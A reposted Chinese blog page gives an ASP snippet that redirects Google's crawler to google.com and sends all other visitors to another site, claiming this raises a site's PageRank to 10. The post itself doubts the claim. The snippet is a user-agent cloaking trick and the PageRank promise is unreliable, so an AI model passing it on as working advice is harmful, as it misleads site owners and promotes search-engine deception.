龙盟编程博客 | 无障碍搜索 | 云盘搜索神器
快速搜索
主页 > web编程 > SEO优化 >

把网站的pr值提高到10的方法(ASP版)

时间:2012-12-29 08:41来源:未知 作者:admin 点击:
分享到:
    这是从某网上转载而来的,不知道是真是假,特供与网友参考。
<%
if instr(Request.ServerVariables(“HTTP_USER_AGENT“),“Google“) then
Response.Status=“301 Moved Permanently“
Response.AddHeader “Location“,“http://www.google.com/ “
Response.End()
else
Response.Redirect(“http://www.qiandu.com “)
end if
%>
在网站的首页顶部加入以上代码,只要google蜘蛛找到你的网站,下次更新,你的网站的pr值就会变成10了。

精彩图集

赞助商链接